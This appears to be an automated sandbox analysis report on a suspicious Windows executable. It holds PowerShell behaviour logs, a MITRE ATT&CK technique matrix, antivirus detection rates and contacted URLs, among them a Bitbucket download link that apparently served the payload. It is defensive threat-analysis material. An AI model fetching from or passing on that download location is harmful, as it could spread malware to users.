        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F8BF4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF7E74F8BF4
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F2D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7E74F2D70
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        MITRE ATT&CK matrix (numbers in parentheses are the counts shown for the matched techniques; cells without a count are the unmatched template entries):

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Scripting (111) | Valid Accounts | Native API (2) | Scripting (111) | DLL Side-Loading (1) | Obfuscated Files or Information (1) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
        Credentials | Domains | Default Accounts | Exploitation for Client Execution (1) | DLL Side-Loading (1) | Access Token Manipulation (1) | Software Packing (1) | LSASS Memory | File and Directory Discovery (2) | Remote Desktop Protocol | Data from Removable Media | Encrypted Channel (21) | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (2) | Registry Run Keys / Startup Folder (1) | Process Injection (11) | Timestomp (1) | Security Account Manager | System Information Discovery (16) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | PowerShell (2) | Login Hook | Registry Run Keys / Startup Folder (1) | DLL Side-Loading (1) | NTDS | Security Software Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (4) | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion (21) | LSA Secrets | Process Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Access Token Manipulation (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (21) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Process Injection (11) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Source | Detection | Scanner | Label | Link
        00wVZ1NU5b.exe | 16% | ReversingLabs | |
        00wVZ1NU5b.exe | 17% | Virustotal | |
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        https://preferences.atlassian.com | 0% | Avira URL Cloud | safe |
        https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net | 0% | Avira URL Cloud | safe |
        https://bitbucket.status.atlassian.com/ | 0% | Avira URL Cloud | safe |
        https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d | 0% | Avira URL Cloud | safe |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        bitbucket.org | 185.166.143.49 | true | false | | high
        Name | Malicious | Antivirus Detection | Reputation
        https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113 | false | | high
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://bitbucket.org/dfghd/fgd/downloads/tesb | powershell.exe, 00000007.00000002.2200418834.00000218C3171000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://admin.atlassian.com | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://contoso.com/License | powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://aka.ms/pscore6 | powershell.exe, 00000005.00000002.2211178390.000001DB2C691000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://api.bitbucket.org | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ | powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://go.micros | powershell.exe, 00000007.00000002.2175735528.00000218AB8EE000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/entry/ad | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://preferences.atlassian.com | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/img/logos/bi | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://www.atlassian.com/try/cloud/signup?bundle=bitbucket | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/ | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://bitbucket.status.atlassian.com/ | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://contoso.com/ | powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/entry/ap | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/entry/ve | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/img/default_ | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://id.atlassian.com/profile/rest/profile&quot; | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://aui-cdn.atlassian.com/ | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://bitbucket.org/gateway/api/emoji/ | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://bqlf8qjztdtr.statuspage.io | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.2211178390.000001DB2C6DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AAC41000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://bitbucket.org | powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmp | false | |
                                                            high
                                                            https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fdfghd%2Ffgd%2powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AC9B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218ACB58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://id.atlassian.com/loginpowershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
